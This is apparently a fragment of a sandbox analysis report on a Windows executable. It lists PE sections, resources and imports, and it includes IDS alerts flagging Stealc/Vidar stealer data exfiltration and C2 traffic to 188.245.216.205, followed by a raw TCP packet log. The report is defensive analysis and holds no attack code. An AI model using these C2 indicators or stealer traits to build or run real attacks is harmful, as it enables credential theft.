| .rsrc | 0x100000 | 0x3b86 | 0x3c00 | 9744b1b7543feb2665749a9110517ce8 | False | 0.8283203125 | data | 7.168312895309525 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x104000 | 0xfd6 | 0x1000 | 618a04743fe4c36423f2a38b2971e4e3 | False | 0.5986328125 | data | 5.600854272197166 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x1001c0 | 0x2327 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.001222358039782 |
| RT_ICON | 0x1024e8 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.5892531876138434 |
| RT_DIALOG | 0x103610 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x103710 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x10382c | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x10388c | 0x22 | data | English | United States | 0.9411764705882353 |
| RT_MANIFEST | 0x1038b0 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193 |

| DLL | Import |
|---|---|
| KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW |
| USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW |
| GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject |
| SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation |
| ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW |
| COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
| ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance |
| VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-27T07:09:32.959230+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.4 | 49740 | 188.245.216.205 | 443 | TCP |
| 2024-12-27T07:09:35.450295+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.4 | 49742 | 188.245.216.205 | 443 | TCP |
| 2024-12-27T07:09:38.030778+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 188.245.216.205 | 443 | 192.168.2.4 | 49743 | TCP |
| 2024-12-27T07:09:40.415459+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 188.245.216.205 | 443 | 192.168.2.4 | 49744 | TCP |

                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699579954 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699601889 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699644089 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699649096 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699672937 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699688911 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699721098 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.701616049 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.701631069 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.844289064 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.844331980 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.844397068 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.844623089 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.844641924 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.893074989 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.893157005 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.905883074 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.905905008 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.906215906 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.906373024 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.906706095 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.947335005 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.598114014 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.598198891 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.598212004 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.598268032 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.598293066 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.598339081 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.600501060 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.600512028 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.602164984 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.602184057 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.602257967 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.602458000 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.602473021 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.050731897 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.052165985 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.052750111 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.052774906 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.054882050 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.054898024 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.959244013 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.959326029 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.959336042 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.959402084 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:33.012392998 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:33.012402058 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:33.025554895 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:33.025566101 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:33.025648117 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:33.025923967 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:33.025938988 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:34.564165115 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:34.564341068 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:34.564851046 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:34.564862013 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:34.574414015 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:34.574426889 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450351954 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450408936 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450442076 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450483084 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450511932 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450541973 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450579882 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450638056 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450794935 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450813055 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.452330112 CET49743443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.452387094 CET44349743188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.452481985 CET49743443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.452701092 CET49743443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.452716112 CET44349743188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:37.121176004 CET44349743188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:37.121273994 CET49743443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:37.121743917 CET49743443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:37.121748924 CET44349743188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:37.123986006 CET49743443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:37.123991966 CET44349743188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:38.030550003 CET44349743188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:38.030584097 CET44349743188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:38.030658960 CET44349743188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:38.030674934 CET49743443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:38.030710936 CET49743443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:38.031083107 CET49743443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.063564062 CET44349755172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.063641071 CET49755443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.063930988 CET49755443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.064023972 CET44349755172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.105592012 CET49755443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.105603933 CET44349755172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.158998013 CET49755443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.574440956 CET44349752172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.574495077 CET44349752172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.574529886 CET44349752172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.574537039 CET49752443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.574552059 CET44349752172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.574587107 CET44349752172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.574599981 CET49752443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.574609995 CET44349752172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.574701071 CET49752443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.574709892 CET44349752172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.583117962 CET44349752172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.583184958 CET49752443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.583195925 CET44349752172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.586256981 CET44349752172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.586349964 CET49752443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.592109919 CET49752443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.592143059 CET44349752172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.693078995 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.693139076 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.693172932 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.693185091 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.693202972 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.693262100 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.693269968 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.701227903 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.701283932 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.701299906 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.711929083 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.712090969 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.712107897 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.726319075 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.726377010 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.726385117 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.744165897 CET44349754172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.744328976 CET44349754172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.744386911 CET49754443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.748150110 CET49754443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.748162985 CET44349754172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.767962933 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.767971039 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.814838886 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.880112886 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.884217978 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.884268999 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.884287119 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.898593903 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.898658991 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.898670912 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.908252954 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.908314943 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.908324957 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.918104887 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.918164015 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.918170929 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.931895018 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.931956053 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.931962967 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.945426941 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.945478916 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.945487976 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.958501101 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.958554029 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.958564043 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.971642017 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.971698046 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.971707106 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.999577999 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.999610901 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.999623060 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.999631882 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.999670982 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:48.003740072 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:48.049225092 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:48.049237967 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:48.083293915 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:48.083347082 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:48.083359957 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:48.090692043 CET44349753172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:48.090744972 CET49753443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:50.994777918 CET49764443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:50.995599031 CET49764443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:50.995604992 CET44349764188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:50.997164965 CET49764443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:50.997169018 CET44349764188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.029970884 CET44349764188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.030039072 CET44349764188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.030040979 CET49764443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.031140089 CET49764443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.031188965 CET49764443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.031209946 CET44349764188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.402462959 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.402548075 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.402937889 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.402944088 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.404506922 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.404506922 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.404516935 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.404534101 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405128956 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405155897 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405286074 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405307055 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405400038 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405419111 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405441046 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405451059 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405519962 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405531883 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405546904 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405556917 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405563116 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405570030 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405606985 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405618906 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405632973 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405639887 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405647039 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.405656099 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.978571892 CET49767443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.978667974 CET44349767188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.978861094 CET49767443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.979053020 CET49767443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:52.979089022 CET44349767188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:53.555107117 CET4973080192.168.2.4152.199.19.74
